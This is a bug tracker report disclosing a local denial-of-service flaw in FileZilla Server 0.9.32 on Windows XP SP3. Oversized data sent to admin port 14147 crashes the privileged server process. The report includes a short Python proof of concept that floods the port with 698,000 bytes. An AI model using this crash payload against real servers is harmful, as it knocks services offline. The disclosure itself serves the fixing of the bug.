FileZilla Server version 0.9.32 local denial of service
|Reported by:||Juan Pablo Lopez Yacubian||Owned by:|
|Keywords:||crash, admin, 14147, fixed||Cc:|
|Component version:||Operating system type:||Windows|
|Operating system version:||XP SP3|
The problem is in a local port (14147) that "filezilla server" used for its interface.
If you send some data to this port, that is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crash.
I did some test with a debugger and i could not run code.. for me is only a denial of service, but is important repair it becuase this process run with the system privileges.
i wrote a poc in python for test
from socket import * host = "127.0.0.1" port = 14147 data = "A" * 698000 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(data) s.close()
OS : Windows Xp SP3 - all patch
Juan Pablo Lopez Yacubian